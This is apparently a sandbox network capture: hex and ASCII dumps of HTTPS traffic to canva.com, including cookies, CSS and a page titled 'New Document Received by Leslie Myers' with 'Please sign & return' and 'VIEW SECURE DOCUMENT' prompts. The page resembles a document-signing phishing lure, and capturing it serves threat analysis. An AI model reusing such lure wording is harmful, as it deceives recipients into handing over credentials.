                                                                                                                                                                                                                                                    2024-12-19 21:27:19 UTC1439INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 46 35 4c 6e 6a 72 4d 54 54 4c 58 73 37 47 31 6b 48 56 25 32 42 53 45 77 62 4d 74 33 37 51 37 6d 48 25 32 42 51 59 57 65 52 79 6e 4c 6a 30 41 4b 58 4e 4a 76 77 37 67 6b 44 7a 65 34 66 42 38 70 37 71 49 59 45 62 78 58 49 69 25 32 42 4f 73 65 45 59 41 4e 63 39 69 45 33 58 53 55 59 52 65 36 7a 6c 66 4a 56 47 36 79 75 44 34 25 32 46 36 43 69 54 79 53 35 25 32 46 69 66 72 43 62 55 47 30 59 4a 78 41 6e 79 4b 58 30 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F5LnjrMTTLXs7G1kHV%2BSEwbMt37Q7mH%2BQYWeRynLj0AKXNJvw7gkDze4fB8p7qIYEbxXIi%2BOseEYANc9iE3XSUYRe6zlfJVG6yuD4%2F6CiTyS5%2FifrCbUG0YJxAnyKX0%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                    2024-12-19 21:27:19 UTC179INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 32 2e 45 62 74 4b 72 35 6b 56 4a 69 37 67 72 4f 46 53 33 4e 4f 6a 74 4c 36 56 4d 4c 2e 48 4c 2e 5f 67 31 49 39 61 37 6f 50 70 67 2d 31 37 33 34 36 34 33 36 33 39 37 30 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; path=/; domain=.canva.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:19 UTC1369INData Raw: 37 66 66 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 74 68 65 6d 65 20 6c 69 67 68 74 20 63 6c 61 73 73 69 63 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 4e 65 77 20 44 6f 63 75 6d 65 6e 74 20 52 65 63 65 69 76 65 64 20 62 79 20 4c 65 73 6c 69 65 20 4d 79 65 72 73 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 64 65 73 69 67 6e 5f 76 69 65 77 65 72 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63
                                                                                                                                                                                                                                                    Data Ascii: 7ff2<!DOCTYPE html><html dir="ltr" lang="en" class="theme light classic"><head><meta charset="utf-8"><title>New Document Received by Leslie Myers</title><meta name="app-name" content="responsive_design_viewer"/><meta name="viewport" content="width=devic
                                                                                                                                                                                                                                                    2024-12-19 21:27:19 UTC1369INData Raw: 63 61 6e 76 61 2e 63 6f 6d 2f 77 65 62 2f 69 6d 61 67 65 73 2f 64 39 37 61 36 66 66 61 35 30 37 62 36 37 30 61 35 62 31 36 36 34 66 39 38 66 63 31 31 38 33 64 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 77 65 62 2f 69 6d 61 67 65 73 2f 31 64 65 37 34 33 34 64 38 36 31 36 36 62 30 36 31 34 66 66 33 64 36 31 63 64 61 31 31 61 35 34 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 75 2b 30 30 61 31 2c 75 2b 30 30 61 61 2d 30 30 61 62 2c 75 2b 30 30 61 66 2c 75 2b 30 30 62 38 2c 75 2b 30 30 62 61 2d 30 30 62 62 2c 75 2b 30 30 62 66 2c 75 2b 30 30 63 30 2d 30 30 64 36 2c 75 2b 30 30 64 38
                                                                                                                                                                                                                                                    Data Ascii: canva.com/web/images/d97a6ffa507b670a5b1664f98fc1183d.woff2) format("woff2"),url(https://static.canva.com/web/images/1de7434d86166b0614ff3d61cda11a54.woff) format("woff");unicode-range:u+00a1,u+00aa-00ab,u+00af,u+00b8,u+00ba-00bb,u+00bf,u+00c0-00d6,u+00d8
                                                                                                                                                                                                                                                    2024-12-19 21:27:19 UTC1369INData Raw: 75 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 34 45 73 75 4d 6e 30 36 55 4a 5a 4b 78 57 33 41 44 6b 4a 30 6f 4b 76 62 6f 5a 6f 39 56 4f 36 67 47 35 32 72 65 4d 72 58 49 6b 35 51 4d 4f 2f 62 67 57 67 45 33 6a 7a 72 74 55 70 6c 50 45 4c 51 53 4b 39 42 37 66 37 38 32 44 4d 6c 44 63 56 58 34 69 66 75 35 51 3d 3d 22 20 6e 6f 6e 63 65 3d 22 63 57 36 70 30 74 30 74 47 4a 54 79 6b 6c 7a 6c 58 52 48 47 2f 67 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 77 65 62 2f 37 36 64 38 62 30 36 36 31 32 62 39 34 35 38 35 2e 76 65 6e 64 6f 72 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e
                                                                                                                                                                                                                                                    Data Ascii: us" integrity="sha512-4EsuMn06UJZKxW3ADkJ0oKvboZo9VO6gG52reMrXIk5QMO/bgWgE3jzrtUplPELQSK9B7f782DMlDcVX4ifu5Q==" nonce="cW6p0t0tGJTyklzlXRHG/g"><link href="https://static.canva.com/web/76d8b06612b94585.vendor.js" rel="preload" as="script" crossorigin="anon
                                                                                                                                                                                                                                                    2024-12-19 21:27:19 UTC1369INData Raw: 69 30 62 31 61 31 59 37 38 6f 41 47 44 75 49 49 38 48 6a 67 2f 76 69 65 77 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 63 61 6e 76 61 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 72 65 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 40 63 61 6e 76 61 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 65 77 20
                                                                                                                                                                                                                                                    Data Ascii: i0b1a1Y78oAGDuII8Hjg/view"><meta property="og:type" content="website"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:site" content="@canva"><meta name="twitter:creator" content="@canva"><meta name="twitter:title" content="New
                                                                                                                                                                                                                                                    2024-12-19 21:27:19 UTC1369INData Raw: 22 3a 66 61 6c 73 65 2c 22 4e 22 3a 66 61 6c 73 65 2c 22 45 22 3a 22 65 34 30 34 64 64 36 35 61 37 30 61 38 32 63 31 63 39 33 33 61 34 62 61 38 38 34 38 33 37 38 38 62 34 36 65 65 34 38 30 22 2c 22 4b 22 3a 31 37 33 34 36 34 33 36 33 39 2c 22 46 22 3a 7b 22 41 3f 22 3a 22 43 22 2c 22 62 22 3a 22 68 74 74 70 73 3a 2f 2f 32 62 66 65 64 63 39 64 30 33 36 37 34 61 61 63 61 63 38 61 61 32 37 36 32 66 32 32 66 65 66 64 40 6f 31 33 38 35 35 2e 69 6e 67 65 73 74 2e 73 65 6e 74 72 79 2e 69 6f 2f 36 30 39 37 39 34 30 22 2c 22 63 22 3a 30 2e 32 2c 22 66 22 3a 66 61 6c 73 65 2c 22 67 22 3a 22 42 22 2c 22 69 22 3a 5b 5d 2c 22 6a 22 3a 7b 22 41 22 3a 74 72 75 65 7d 2c 22 6b 22 3a 7b 22 41 22 3a 66 61 6c 73 65 2c 22 42 22 3a 31 30 30 2c 22 43 22 3a 33 30 2c 22 44 22 3a
                                                                                                                                                                                                                                                    Data Ascii: ":false,"N":false,"E":"e404dd65a70a82c1c933a4ba88483788b46ee480","K":1734643639,"F":{"A?":"C","b":"https://2bfedc9d03674aacac8aa2762f22fefd@o13855.ingest.sentry.io/6097940","c":0.2,"f":false,"g":"B","i":[],"j":{"A":true},"k":{"A":false,"B":100,"C":30,"D":
                                                                                                                                                                                                                                                    2024-12-19 21:27:19 UTC1369INData Raw: 42 72 61 7a 65 22 7d 2c 7b 22 41 22 3a 22 45 22 2c 22 42 22 3a 22 43 61 6e 76 61 22 7d 2c 7b 22 41 22 3a 22 45 22 2c 22 42 22 3a 22 46 61 63 65 62 6f 6f 6b 22 7d 2c 7b 22 41 22 3a 22 45 22 2c 22 42 22 3a 22 46 61 63 65 62 6f 6f 6b 20 53 44 4b 22 7d 2c 7b 22 41 22 3a 22 45 22 2c 22 42 22 3a 22 47 6f 6f 67 6c 65 20 41 64 73 22 7d 2c 7b 22 41 22 3a 22 45 22 2c 22 42 22 3a 22 47 6f 6f 67 6c 65 20 44 6f 75 62 6c 65 43 6c 69 63 6b 22 7d 2c 7b 22 41 22 3a 22 45 22 2c 22 42 22 3a 22 47 6f 6f 67 6c 65 20 46 69 72 65 62 61 73 65 22 7d 2c 7b 22 41 22 3a 22 45 22 2c 22 42 22 3a 22 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 22 7d 2c 7b 22 41 22 3a 22 45 22 2c 22 42 22 3a 22 4c 69 6e 6b 65 64 49 6e 20 49 6e 73 69 67 68 74 73 22 7d 2c 7b 22 41 22 3a 22 45 22
                                                                                                                                                                                                                                                    Data Ascii: Braze"},{"A":"E","B":"Canva"},{"A":"E","B":"Facebook"},{"A":"E","B":"Facebook SDK"},{"A":"E","B":"Google Ads"},{"A":"E","B":"Google DoubleClick"},{"A":"E","B":"Google Firebase"},{"A":"E","B":"Google Tag Manager"},{"A":"E","B":"LinkedIn Insights"},{"A":"E"
                                                                                                                                                                                                                                                    2024-12-19 21:27:19 UTC1369INData Raw: 48 31 4c 4f 22 3a 22 42 22 2c 22 41 41 45 46 4f 22 3a 22 41 22 7d 2c 22 49 22 3a 22 77 65 62 22 2c 22 50 22 3a 5b 2d 35 38 33 36 39 2c 37 38 35 35 37 35 5d 2c 22 51 22 3a 5b 2d 33 33 35 34 37 39 34 38 2c 31 36 38 31 30 33 5d 2c 22 52 22 3a 66 61 6c 73 65 2c 22 53 22 3a 66 61 6c 73 65 2c 22 66 22 3a 7b 22 42 22 3a 7b 22 41 22 3a 22 47 54 4d 2d 54 5a 50 54 4b 52 52 22 7d 2c 22 44 22 3a 7b 22 41 22 3a 22 31 36 38 35 39 36 39 31 30 33 37 22 2c 22 42 22 3a 22 31 36 38 35 39 36 39 31 30 33 37 22 7d 7d 2c 22 6b 22 3a 66 61 6c 73 65 2c 22 6e 22 3a 66 61 6c 73 65 2c 22 73 22 3a 66 61 6c 73 65 2c 22 75 22 3a 66 61 6c 73 65 7d 2c 22 66 22 3a 7b 22 42 22 3a 22 33 32 30 66 37 33 33 32 2d 38 35 37 31 2d 34 35 64 37 2d 62 33 34 32 2d 63 35 34 31 39 32 64 61 65 35 34 37
                                                                                                                                                                                                                                                    Data Ascii: H1LO":"B","AAEFO":"A"},"I":"web","P":[-58369,785575],"Q":[-33547948,168103],"R":false,"S":false,"f":{"B":{"A":"GTM-TZPTKRR"},"D":{"A":"16859691037","B":"16859691037"}},"k":false,"n":false,"s":false,"u":false},"f":{"B":"320f7332-8571-45d7-b342-c54192dae547
                                                                                                                                                                                                                                                    2024-12-19 21:27:19 UTC1369INData Raw: 22 42 5f 22 2c 22 4b 22 3a 22 63 65 6e 74 65 72 22 7d 7d 2c 7b 22 41 22 3a 7b 22 41 3f 22 3a 22 41 22 2c 22 41 22 3a 22 50 6c 65 61 73 65 20 73 69 67 6e 20 26 20 72 65 74 75 72 6e 22 7d 2c 22 43 22 3a 7b 22 41 3f 22 3a 22 42 5f 22 2c 22 4b 22 3a 74 72 75 65 7d 7d 2c 7b 22 41 22 3a 7b 22 41 3f 22 3a 22 41 22 2c 22 41 22 3a 22 5c 5c 6e 22 7d 2c 22 42 22 3a 7b 22 41 3f 22 3a 22 42 5f 22 2c 22 4b 22 3a 22 63 65 6e 74 65 72 22 7d 7d 2c 7b 22 41 22 3a 7b 22 41 3f 22 3a 22 41 22 2c 22 41 22 3a 22 56 49 45 57 20 53 45 43 55 52 45 20 44 4f 43 55 4d 45 4e 54 22 7d 2c 22 42 22 3a 7b 22 41 3f 22 3a 22 42 5f 22 2c 22 42 22 3a 22 32 34 70 78 22 2c 22 43 22 3a 22 62 6f 6c 64 22 2c 22 45 22 3a 22 23 31 61 36 32 66 66 22 2c 22 46 22 3a 22 75 6e 64 65 72 6c 69 6e 65 22 2c
                                                                                                                                                                                                                                                    Data Ascii: "B_","K":"center"}},{"A":{"A?":"A","A":"Please sign & return"},"C":{"A?":"B_","K":true}},{"A":{"A?":"A","A":"\\n"},"B":{"A?":"B_","K":"center"}},{"A":{"A?":"A","A":"VIEW SECURE DOCUMENT"},"B":{"A?":"B_","B":"24px","C":"bold","E":"#1a62ff","F":"underline",


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    1192.168.2.449745104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC589OUTGET /web/a0684b0780c739e9.vendor.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1351INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:21 GMT
                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                    Content-Length: 10359
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a79e7bd5a1881-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1871464
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "4eb0cc037aa215c5fa2eb3c1b342613d"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:07 GMT
                                                                                                                                                                                                                                                    Last-Modified: Fri, 18 Oct 2024 07:51:03 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sun, 19 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: +Bknow7LxwHRHZzUx90rgsp/fiM1Oc0uP75nzqT1xptdiF/c2gMLXzT6EwEm2+fCeqkwn4P2UWU=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: D8QZ794VD87GJQ26
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: CGf10l3JVSyT8vmoHK2P9e5Jd3e.aLdJ
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC775INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 56 32 71 77 79 68 65 33 42 2e 51 41 38 49 42 39 79 33 61 76 76 4a 32 76 4c 5f 4f 69 6e 64 73 6b 6d 67 57 33 78 74 56 76 4b 75 6f 2d 31 37 33 34 36 34 33 36 34 31 2d 31 2e 30 2e 31 2e 31 2d 50 79 61 63 6f 45 37 38 66 73 6d 78 4f 54 5a 70 48 4d 53 67 35 4f 7a 30 6e 74 32 38 68 43 4e 7a 6e 76 42 73 39 49 41 5f 48 4f 38 32 69 45 55 44 30 75 37 7a 63 6c 34 67 58 4d 65 79 75 56 74 58 61 77 30 66 49 41 6b 56 46 68 44 4e 55 4c 32 74 47 4b 35 77 63 51 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 32 31 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=V2qwyhe3B.QA8IB9y3avvJ2vL_OindskmgW3xtVvKuo-1734643641-1.0.1.1-PyacoE78fsmxOTZpHMSg5Oz0nt28hCNznvBs9IA_HO82iEUD0u7zcl4gXMeyuVtXaw0fIAkVFhDNUL2tGK5wcQ; path=/; expires=Thu, 19-Dec-24 21:57:21 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC612INData Raw: 2f 2a 21 0a 20 2a 20 51 75 69 6c 6c 20 45 64 69 74 6f 72 20 76 32 2e 30 2e 30 2d 64 65 76 2e 34 36 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 71 75 69 6c 6c 6a 73 2e 63 6f 6d 2f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 34 2c 20 4a 61 73 6f 6e 20 43 68 65 6e 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 33 2c 20 73 61 6c 65 73 66 6f 72 63 65 2e 63 6f 6d 0a 20 2a 2f 2e 71 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65
                                                                                                                                                                                                                                                    Data Ascii: /*! * Quill Editor v2.0.0-dev.46 * https://quilljs.com/ * Copyright (c) 2014, Jason Chen * Copyright (c) 2013, salesforce.com */.ql-container{box-sizing:border-box;font-family:Helvetica,Arial,sans-serif;font-size:13px;height:100%;margin:0;position:re
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 63 6f 75 6e 74 65 72 2d 72 65 73 65 74 3a 6c 69 73 74 2d 30 20 6c 69 73 74 2d 31 20 6c 69 73 74 2d 32 20 6c 69 73 74 2d 33 20 6c 69 73 74 2d 34 20 6c 69 73 74 2d 35 20 6c 69 73 74 2d 36 20 6c 69 73 74 2d 37 20 6c 69 73 74 2d 38 20 6c 69 73 74 2d 39 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 31 35 70 78 3b 74 61 62 2d 73 69 7a 65 3a 34 3b 2d 6d 6f 7a 2d 74 61 62 2d 73 69 7a 65 3a 34 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 77 72 61 70 7d 2e 71 6c 2d 65 64 69 74 6f 72 3e 2a 7b
                                                                                                                                                                                                                                                    Data Ascii: sizing:border-box;counter-reset:list-0 list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9;height:100%;line-height:1.42;outline:none;overflow-y:auto;padding:12px 15px;tab-size:4;-moz-tab-size:4;text-align:left;white-space:pre-wrap}.ql-editor>*{
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 61 2d 6c 69 73 74 3d 75 6e 63 68 65 63 6b 65 64 5d 3e 2e 71 6c 2d 75 69 7b 63 6f 6c 6f 72 3a 23 37 37 37 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 6c 69 5b 64 61 74 61 2d 6c 69 73 74 3d 62 75 6c 6c 65 74 5d 3e 2e 71 6c 2d 75 69 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 32 30 32 32 22 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 6c 69 5b 64 61 74 61 2d 6c 69 73 74 3d 63 68 65 63 6b 65 64 5d 3e 2e 71 6c 2d 75 69 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 32 36 31 31 22 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 6c 69 5b 64 61 74 61 2d 6c 69 73 74 3d 75 6e 63 68 65 63 6b 65 64 5d 3e 2e 71 6c 2d 75 69 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 32 36 31 30 22 7d 40 73 75 70 70 6f 72 74 73 20 28 63 6f 75 6e 74 65 72 2d 73 65 74 3a 6e 6f 6e 65 29 7b
                                                                                                                                                                                                                                                    Data Ascii: a-list=unchecked]>.ql-ui{color:#777}.ql-editor li[data-list=bullet]>.ql-ui:before{content:"\2022"}.ql-editor li[data-list=checked]>.ql-ui:before{content:"\2611"}.ql-editor li[data-list=unchecked]>.ql-ui:before{content:"\2610"}@supports (counter-set:none){
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 20 6c 69 73 74 2d 39 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 63 6f 75 6e 74 65 72 2d 73 65 74 3a 6e 6f 6e 65 29 7b 2e 71 6c 2d 65 64 69 74 6f 72 20 6c 69 5b 64 61 74 61 2d 6c 69 73 74 5d 2e 71 6c 2d 69 6e 64 65 6e 74 2d 32 7b 63 6f 75 6e 74 65 72 2d 72 65 73 65 74 3a 6c 69 73 74 2d 33 20 6c 69 73 74 2d 34 20 6c 69 73 74 2d 35 20 6c 69 73 74 2d 36 20 6c 69 73 74 2d 37 20 6c 69 73 74 2d 38 20 6c 69 73 74 2d 39 7d 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 6c 69 5b 64 61 74 61 2d 6c 69 73 74 3d 6f 72 64 65 72 65 64 5d 2e 71 6c 2d 69 6e 64 65 6e 74 2d 33 7b 63 6f 75 6e 74 65 72 2d 69 6e 63 72 65 6d 65 6e 74 3a 6c 69 73 74 2d 33 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 6c 69 5b 64 61 74 61 2d 6c 69 73 74 3d 6f 72 64 65 72 65 64 5d 2e 71 6c 2d 69 6e 64 65 6e 74
                                                                                                                                                                                                                                                    Data Ascii: list-9}}@supports not (counter-set:none){.ql-editor li[data-list].ql-indent-2{counter-reset:list-3 list-4 list-5 list-6 list-7 list-8 list-9}}.ql-editor li[data-list=ordered].ql-indent-3{counter-increment:list-3}.ql-editor li[data-list=ordered].ql-indent
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 2d 6c 69 73 74 3d 6f 72 64 65 72 65 64 5d 2e 71 6c 2d 69 6e 64 65 6e 74 2d 36 7b 63 6f 75 6e 74 65 72 2d 69 6e 63 72 65 6d 65 6e 74 3a 6c 69 73 74 2d 36 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 6c 69 5b 64 61 74 61 2d 6c 69 73 74 3d 6f 72 64 65 72 65 64 5d 2e 71 6c 2d 69 6e 64 65 6e 74 2d 36 3e 2e 71 6c 2d 75 69 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 63 6f 75 6e 74 65 72 28 6c 69 73 74 2d 36 2c 64 65 63 69 6d 61 6c 29 20 22 2e 20 22 7d 40 73 75 70 70 6f 72 74 73 20 28 63 6f 75 6e 74 65 72 2d 73 65 74 3a 6e 6f 6e 65 29 7b 2e 71 6c 2d 65 64 69 74 6f 72 20 6c 69 5b 64 61 74 61 2d 6c 69 73 74 5d 2e 71 6c 2d 69 6e 64 65 6e 74 2d 36 7b 63 6f 75 6e 74 65 72 2d 73 65 74 3a 6c 69 73 74 2d 37 20 6c 69 73 74 2d 38 20 6c 69 73 74 2d 39 7d 7d 40 73 75 70 70 6f 72
                                                                                                                                                                                                                                                    Data Ascii: -list=ordered].ql-indent-6{counter-increment:list-6}.ql-editor li[data-list=ordered].ql-indent-6>.ql-ui:before{content:counter(list-6,decimal) ". "}@supports (counter-set:none){.ql-editor li[data-list].ql-indent-6{counter-set:list-7 list-8 list-9}}@suppor
